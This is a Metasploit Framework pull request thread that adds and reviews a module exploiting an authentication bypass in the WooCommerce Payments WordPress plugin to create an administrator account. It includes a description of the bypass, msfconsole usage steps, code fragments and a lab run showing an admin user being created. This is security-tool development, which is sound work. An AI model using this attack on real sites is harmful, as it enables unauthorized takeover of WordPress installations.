WooCommerce Payments auth bypass and priv esc
rapid7/metasploit-framework pull request #18164
Opened 2023-07-04 17:10 UTC by h00die

fixes #18159

This PR adds a module to exploit an auth bypass and priv esc to create a new user on a wordpress instance which is running WooCommerce Payments < 5.6.1.  Pretty simple, add a header to execute the bypass, then we just use the API to create a new user.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Install the plugin
- [ ] Start msfconsole
- [ ] Do: `use auxiliary/scanner/http/wp_woocommerce_payments_add_user`
- [ ] Do: `set username [username]`
- [ ] Do: `set rhosts [ip]`
- [ ] Do: `run`
- [ ] You should get a new administrator created and the credentials.

2023-07-04 23:28 UTC, jvoisin reviewed
Glorious!

2023-07-04 23:28 UTC, jvoisin commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +    end
```suggestion
    email = datastore['EMAIL']
    if email.blank?
      email = Rex::Text.rand_mail_address
    end
```

2023-07-05 06:05 UTC, gwillcox-r7 commented
> Glorious!

Model O? 😆

2023-07-05 15:18 UTC, gwillcox-r7 requested changes

2023-07-05 15:18 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +          to create a new user with administartive privileges IF the user ID selected was also an administrator.
Note this is just a suggestion, however we will likely need to update wording as per the version comment for the check code below. Also needs to be applied to the documentation file as well.

2023-07-05 15:18 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      next if res.code == 404
Question, but if both of these URLs get 404, whats the case to catch this? From current code it seems like we just silently fail as there is no code after this `.each` code to check for success, so it will just execute twice, hit the `next` twice, then realize it has no more data to process and will just jump to line 114 where it will see two `end` statements and nothing more to do.

2023-07-05 15:18 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      if res.code == 201
Is there any response body we can match on to be more specific rather than just relying on a status code which may not be the best indicator? 201 is rarely used so its a good match but there is still the possibility the server returns 201 for some unrelated reason, albeit this possibility is small.

2023-07-05 15:18 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +            service_name: 'Wordpress',
```suggestion
            service_name: 'WordPress',
```

2023-07-05 15:18 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +            status: Metasploit::Model::Login::Status::SUCCESSFUL
Where is the `private_data` field here for the password? Where is the `username` field for the username? Doesn't seem like your actually reporting the username or password in your call to `create_credential_and_login` here, so from what I'm seeing I don't think your actually saving the login information to the database.

2023-07-05 16:03 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +    end
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/da6cdd1d5b3c19b87702488dd8f64e3c1d963328

2023-07-05 17:32 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +Download, install, and Activate [woocomerce-payments](https://downloads.wordpress.org/plugin/woocommerce-payments.5.6.1.zip)
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:35 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +No configuration is required, and WooCommerce itself is not required.
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:39 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +1. You should get a new administrator created and the credentials.
Reworded in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:40 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +[*] Attempting to create administrator -> h00die:lWqD3BOer3AFZ (willie.miller@iwuxphff.qiawqio9t.gov)
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:40 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +    print_status("Attempting to create administrator -> #{datastore['USERNAME']}:#{password} (#{email})")
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:41 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +to create a new user with administartive privileges IF the user ID selected was also an administrator.
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 17:41 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +          to create a new user with administartive privileges IF the user ID selected was also an administrator.
Typos fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e and some information on the version ranges affected was also added in.

2023-07-05 17:49 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +WooCommerce-Payments plugin for Wordpress contains an authentication bypass by specifing a valid user ID number
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/ce19ce5b72ddc135f4882d699761e74b69a9db0e

2023-07-05 18:11 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +The user ID number for an administrator. Defaults to `1`
Fixed explanation with https://github.com/rapid7/metasploit-framework/pull/18164/commits/3abcb3ebaa682fc6b00398873d02e57b274fafb4. We can add user ID enumeration if we want, but it isn't a blocker to landing this.

2023-07-05 21:23 UTC, gwillcox-r7 commented
@h00die Tested this but the endpoint /wp-json/wp/v2/users doesn't seem to exist on latest WordPress and all requests to /index.php/anything redirect to the homepage of the WordPress site that is set up.

As discussed on Slack though, feel free to pick at this now if you want to do anything as you won't be interrupting me, though happy to discuss anything further if you need additional info.

2023-07-06 13:39 UTC, adfoster-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +    [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
```suggestion
    ['/', 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
```

2023-07-06 14:23 UTC, gwillcox-r7 commented
Okay after updating those settings I confirmed the exploit works as expected. Still need to update the database code to properly log the creds and I need to update the code to fix Alan's comment and also an issue I found during testing.

2023-07-06 14:37 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +    [nil, 'index.php'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
Fixed in https://github.com/rapid7/metasploit-framework/pull/18164/commits/c3aefe577be0547422563f16cd13677e8f9d5ac1

2023-07-06 14:37 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      if res.code == 201
Fixed this to be more specific in https://github.com/rapid7/metasploit-framework/pull/18164/commits/c3aefe577be0547422563f16cd13677e8f9d5ac1

2023-07-06 15:44 UTC, gwillcox-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +            status: Metasploit::Model::Login::Status::SUCCESSFUL
Fixed this with https://github.com/rapid7/metasploit-framework/pull/18164/commits/81cf6c2a09b6f323f811ca448842ea809f601d62 which includes several fields that were found to be missing in order to successfully store the credential without Metasploit stack tracing on errors.

2023-07-06 15:56 UTC, gwillcox-r7 commented
@h00die Should be all good to go now minus the check code logic for the version numbers. That will require some more work.

2023-07-09 23:49 UTC, h00die commented
@gwillcox-r7 will you still be handling this, or is it off to someone new?

I wrote a check method, since it can have min/max, i just looped through each vuln set.  Its prob not perfect, but I think it'll cover 99% of the cases until this isn't relevant anymore

2023-07-10 00:40 UTC, adfoster-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      checkcode = check_plugin_version_from_readme('woocommerce-payments', fixed, introduced)
From a quick glance, it looks like this will make multiple requests out, is that something we want to do? Wondering is there a more elegant way to achieve this, i.e. a richer API that makes the single HTTP request, and offers a way to check the impacted versions 👀

2023-07-10 10:40 UTC, h00die commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      checkcode = check_plugin_version_from_readme('woocommerce-payments', fixed, introduced)
I had edited the message to include that, that's why it needed to be re-read.

Yea, I consider editing the Library and cross testing that with some other modules to ensure backwards compatibility, and writing a spec to be outside the scope of this module.  The current implementation is a little ugly, true, but it gets the job done accurately.  It's the best I can do w/ the tools given.

I don't mind writing up an issue though to at least document the library needs to be fixed

2023-07-10 12:29 UTC, adfoster-r7 commented on modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.rb
> +      checkcode = check_plugin_version_from_readme('woocommerce-payments', fixed, introduced)
Sounds good to me :+1:

2023-07-10 12:29 UTC, adfoster-r7 commented
> @gwillcox-r7 will you still be handling this, or is it off to someone new?

Looks like a new person will need to pick this up :+1:

2023-07-10 18:18 UTC, jheysel-r7 commented on documentation/modules/auxiliary/scanner/http/wp_woocommerce_payments_add_user.md
> +The user ID number for an WordPress administrator. Defaults to `1`.
```suggestion
The user ID number for a WordPress administrator. Defaults to `1`.
```

2023-07-10 18:30 UTC, jheysel-r7 reviewed
Looks great @h00die, thanks for the module! 
```
msf6 > use auxiliary/scanner/http/wp_woocommerce_payments_add_user
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set rport 8000
rport => 8000
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > set username jheysel
username => jheysel
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > options

Module options (auxiliary/scanner/http/wp_woocommerce_payments_add_user):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ADMINID    1                no        ID Number of a WordPress administrative user
   EMAIL                       no        Email to create, random if blank
   PASSWORD                    no        Password to create, random if blank
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Wordpress instance
   USERNAME   jheysel          yes       User to create
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. WooCommerce-Payments version is exploitable
[*] Attempting to create an administrator user -> jheysel:PdbMBQYqST8dl (robert.simmons@y.gsq.thg0a3soj.vxes3ghxwi.ypdlyl0.edu)
[+] User was created successfully
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) >
```

2023-07-10 22:01 UTC, merged

2023-07-10 22:10 UTC, jheysel-r7 commented
# Release Notes 
This module exploits an auth by-pass vulnerability in the WooCommerce WordPress plugin. By sending a speciality crafted request to the plugin an attacker can by-pass authentication and then use the WordPress API to create an admin user in WordPress.